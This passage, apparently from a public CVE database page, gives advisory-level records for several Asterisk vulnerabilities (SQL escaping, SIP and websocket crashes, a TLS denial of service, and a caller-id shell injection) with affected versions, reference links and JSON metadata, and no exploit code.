          "value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-18T00:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
        },
        {
          "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
        },
        {
          "name": "DSA-5285",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5285"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-26651",
    "datePublished": "2022-04-15T00:00:00",
    "dateReserved": "2022-03-07T00:00:00",
    "dateUpdated": "2024-08-03T05:11:43.391Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26906

Vulnerability from cvelistv5

Published

2021-02-18 19:50

Modified

2024-08-03 20:33

Severity ?

Summary

An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/	x_refsource_MISC
	http://seclists.org/fulldisclosure/2021/Feb/61	mailing-list, x_refsource_FULLDISC
	https://downloads.asterisk.org/pub/security/AST-2021-005.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-29196	x_refsource_CONFIRM
	http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.368Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "name": "20210218 AST-2021-005: Remote Crash Vulnerability in PJSIP channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Feb/61"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-19T15:06:10",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "name": "20210218 AST-2021-005: Remote Crash Vulnerability in PJSIP channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Feb/61"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-26906",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://downloads.asterisk.org/pub/security/",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "name": "20210218 AST-2021-005: Remote Crash Vulnerability in PJSIP channel driver",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Feb/61"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2021-005.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29196",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
            },
            {
              "name": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-26906",
    "datePublished": "2021-02-18T19:50:04",
    "dateReserved": "2021-02-08T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.368Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-17281

Vulnerability from cvelistv5

Published

2018-09-24 22:00

Modified

2024-08-05 10:47

Severity ?

Summary

There is a stack consumption vulnerability in the res_http_websocket.so module of Asterisk through 13.23.0, 14.7.x through 14.7.7, and 15.x through 15.6.0 and Certified Asterisk through 13.21-cert2. It allows an attacker to crash Asterisk via a specially crafted HTTP request to upgrade the connection to a websocket.

References

▼	URL	Tags
	http://www.securitytracker.com/id/1041694	vdb-entry, x_refsource_SECTRACK
	http://seclists.org/fulldisclosure/2018/Sep/31	mailing-list, x_refsource_FULLDISC
	http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html	x_refsource_MISC
	https://www.debian.org/security/2018/dsa-4320	vendor-advisory, x_refsource_DEBIAN
	https://seclists.org/bugtraq/2018/Sep/53	mailing-list, x_refsource_BUGTRAQ
	https://issues.asterisk.org/jira/browse/ASTERISK-28013	x_refsource_CONFIRM
	https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html	mailing-list, x_refsource_MLIST
	https://security.gentoo.org/glsa/201811-11	vendor-advisory, x_refsource_GENTOO
	http://www.securityfocus.com/bid/105389	vdb-entry, x_refsource_BID
	http://downloads.asterisk.org/pub/security/AST-2018-009.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T10:47:04.106Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1041694",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1041694"
          },
          {
            "name": "20180920 AST-2018-009: Remote crash vulnerability in HTTP websocket upgrade",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2018/Sep/31"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html"
          },
          {
            "name": "DSA-4320",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4320"
          },
          {
            "name": "20180920 AST-2018-009: Remote crash vulnerability in HTTP websocket upgrade",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2018/Sep/53"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28013"
          },
          {
            "name": "[debian-lts-announce] 20180927 [SECURITY] [DLA 1523-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html"
          },
          {
            "name": "GLSA-201811-11",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201811-11"
          },
          {
            "name": "105389",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/105389"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2018-009.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-09-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "There is a stack consumption vulnerability in the res_http_websocket.so module of Asterisk through 13.23.0, 14.7.x through 14.7.7, and 15.x through 15.6.0 and Certified Asterisk through 13.21-cert2. It allows an attacker to crash Asterisk via a specially crafted HTTP request to upgrade the connection to a websocket."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-11-25T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1041694",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1041694"
        },
        {
          "name": "20180920 AST-2018-009: Remote crash vulnerability in HTTP websocket upgrade",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2018/Sep/31"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html"
        },
        {
          "name": "DSA-4320",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4320"
        },
        {
          "name": "20180920 AST-2018-009: Remote crash vulnerability in HTTP websocket upgrade",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2018/Sep/53"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28013"
        },
        {
          "name": "[debian-lts-announce] 20180927 [SECURITY] [DLA 1523-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html"
        },
        {
          "name": "GLSA-201811-11",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201811-11"
        },
        {
          "name": "105389",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/105389"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2018-009.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-17281",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "There is a stack consumption vulnerability in the res_http_websocket.so module of Asterisk through 13.23.0, 14.7.x through 14.7.7, and 15.x through 15.6.0 and Certified Asterisk through 13.21-cert2. It allows an attacker to crash Asterisk via a specially crafted HTTP request to upgrade the connection to a websocket."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1041694",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1041694"
            },
            {
              "name": "20180920 AST-2018-009: Remote crash vulnerability in HTTP websocket upgrade",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2018/Sep/31"
            },
            {
              "name": "http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/149453/Asterisk-Project-Security-Advisory-AST-2018-009.html"
            },
            {
              "name": "DSA-4320",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4320"
            },
            {
              "name": "20180920 AST-2018-009: Remote crash vulnerability in HTTP websocket upgrade",
              "refsource": "BUGTRAQ",
              "url": "https://seclists.org/bugtraq/2018/Sep/53"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-28013",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28013"
            },
            {
              "name": "[debian-lts-announce] 20180927 [SECURITY] [DLA 1523-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00034.html"
            },
            {
              "name": "GLSA-201811-11",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201811-11"
            },
            {
              "name": "105389",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/105389"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2018-009.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2018-009.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-17281",
    "datePublished": "2018-09-24T22:00:00",
    "dateReserved": "2018-09-20T00:00:00",
    "dateUpdated": "2024-08-05T10:47:04.106Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-1175

Vulnerability from cvelistv5

Published

2011-03-31 22:00

Modified

2024-08-06 22:21

Severity ?

Summary

tcptls.c in the TCP/TLS server in Asterisk Open Source 1.6.1.x before 1.6.1.23, 1.6.2.x before 1.6.2.17.1, and 1.8.x before 1.8.3.1 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by establishing many short TCP sessions to services that use a certain TLS API.

References

▼	URL	Tags
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html	vendor-advisory, x_refsource_FEDORA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/66140	vdb-entry, x_refsource_XF
	http://downloads.asterisk.org/pub/security/AST-2011-004.html	x_refsource_CONFIRM
	http://www.debian.org/security/2011/dsa-2225	vendor-advisory, x_refsource_DEBIAN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html	vendor-advisory, x_refsource_FEDORA
	http://openwall.com/lists/oss-security/2011/03/17/5	mailing-list, x_refsource_MLIST
	https://bugzilla.redhat.com/show_bug.cgi?id=688678	x_refsource_CONFIRM
	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html	vendor-advisory, x_refsource_FEDORA
	http://www.vupen.com/english/advisories/2011/0686	vdb-entry, x_refsource_VUPEN
	http://www.vupen.com/english/advisories/2011/0790	vdb-entry, x_refsource_VUPEN
	http://securitytracker.com/id?1025224	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/46898	vdb-entry, x_refsource_BID
	http://openwall.com/lists/oss-security/2011/03/21/12	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:21:32.241Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "FEDORA-2011-3945",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
          },
          {
            "name": "asterisk-handletcptlsconnection-dos(66140)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66140"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-004.html"
          },
          {
            "name": "DSA-2225",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2225"
          },
          {
            "name": "FEDORA-2011-3942",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
          },
          {
            "name": "[oss-security] 20110317 CVE request for Asterisk flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688678"
          },
          {
            "name": "FEDORA-2011-3958",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
          },
          {
            "name": "ADV-2011-0686",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0686"
          },
          {
            "name": "ADV-2011-0790",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/0790"
          },
          {
            "name": "1025224",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025224"
          },
          {
            "name": "46898",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/46898"
          },
          {
            "name": "[oss-security] 20110321 Re: CVE request for Asterisk flaws",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-03-16T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "tcptls.c in the TCP/TLS server in Asterisk Open Source 1.6.1.x before 1.6.1.23, 1.6.2.x before 1.6.2.17.1, and 1.8.x before 1.8.3.1 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by establishing many short TCP sessions to services that use a certain TLS API."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-16T14:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "FEDORA-2011-3945",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
        },
        {
          "name": "asterisk-handletcptlsconnection-dos(66140)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66140"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-004.html"
        },
        {
          "name": "DSA-2225",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2225"
        },
        {
          "name": "FEDORA-2011-3942",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
        },
        {
          "name": "[oss-security] 20110317 CVE request for Asterisk flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688678"
        },
        {
          "name": "FEDORA-2011-3958",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
        },
        {
          "name": "ADV-2011-0686",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0686"
        },
        {
          "name": "ADV-2011-0790",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/0790"
        },
        {
          "name": "1025224",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025224"
        },
        {
          "name": "46898",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/46898"
        },
        {
          "name": "[oss-security] 20110321 Re: CVE request for Asterisk flaws",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-1175",
    "datePublished": "2011-03-31T22:00:00",
    "dateReserved": "2011-03-03T00:00:00",
    "dateUpdated": "2024-08-06T22:21:32.241Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-14100

Vulnerability from cvelistv5

Published

2017-09-02 16:00

Modified

2024-08-05 19:20

Severity ?

Summary

In Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized command execution is possible. The app_minivm module has an "externnotify" program configuration option that is executed by the MinivmNotify dialplan application. The application uses the caller-id name and number as part of a built string passed to the OS shell for interpretation and execution. Since the caller-id name and number can come from an untrusted source, a crafted caller-id name or number allows an arbitrary shell command injection.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-27103	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1039252	vdb-entry, x_refsource_SECTRACK
	https://bugs.debian.org/873908	x_refsource_CONFIRM
	https://security.gentoo.org/glsa/201710-29	vendor-advisory, x_refsource_GENTOO
	http://www.debian.org/security/2017/dsa-3964	vendor-advisory, x_refsource_DEBIAN
	http://downloads.asterisk.org/pub/security/AST-2017-006.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T19:20:39.875Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27103"
          },
          {
            "name": "1039252",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1039252"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.debian.org/873908"
          },
          {
            "name": "GLSA-201710-29",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201710-29"
          },
          {
            "name": "DSA-3964",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2017/dsa-3964"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2017-006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-09-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "In Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized command execution is possible. The app_minivm module has an \"externnotify\" program configuration option that is executed by the MinivmNotify dialplan application. The application uses the caller-id name and number as part of a built string passed to the OS shell for interpretation and execution. Since the caller-id name and number can come from an untrusted source, a crafted caller-id name or number allows an arbitrary shell command injection."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-11-03T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27103"
        },
        {
          "name": "1039252",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1039252"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.debian.org/873908"
        },
        {
          "name": "GLSA-201710-29",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201710-29"
        },
        {
          "name": "DSA-3964",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2017/dsa-3964"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2017-006.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-14100",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
